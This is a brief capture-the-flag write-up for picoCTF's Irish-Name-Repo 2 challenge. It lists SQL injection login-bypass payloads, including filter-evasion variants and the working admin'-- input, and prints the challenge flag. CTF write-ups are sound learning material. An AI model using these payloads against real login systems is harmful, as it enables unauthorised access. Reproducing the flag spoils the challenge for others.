Coming from this challenge's prequel Irish-Name-Repo 1 - picoCTF '19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
' oR 1=1 -- - case manipulation
%27%20%20%6f%72%20%31%3d%31%20%2d%2d- URL encoding
'/**/ or /**/ 1=1 /**/ -- - Comment obfuscation
00%' or 1=1 -- - null hex encoding
...and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
use admin'-- in the username parameter.
Breakdown:
-
admin- value for username query. -
'- closes the input string. -
--- comments out the remaining query.
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Top comments (0)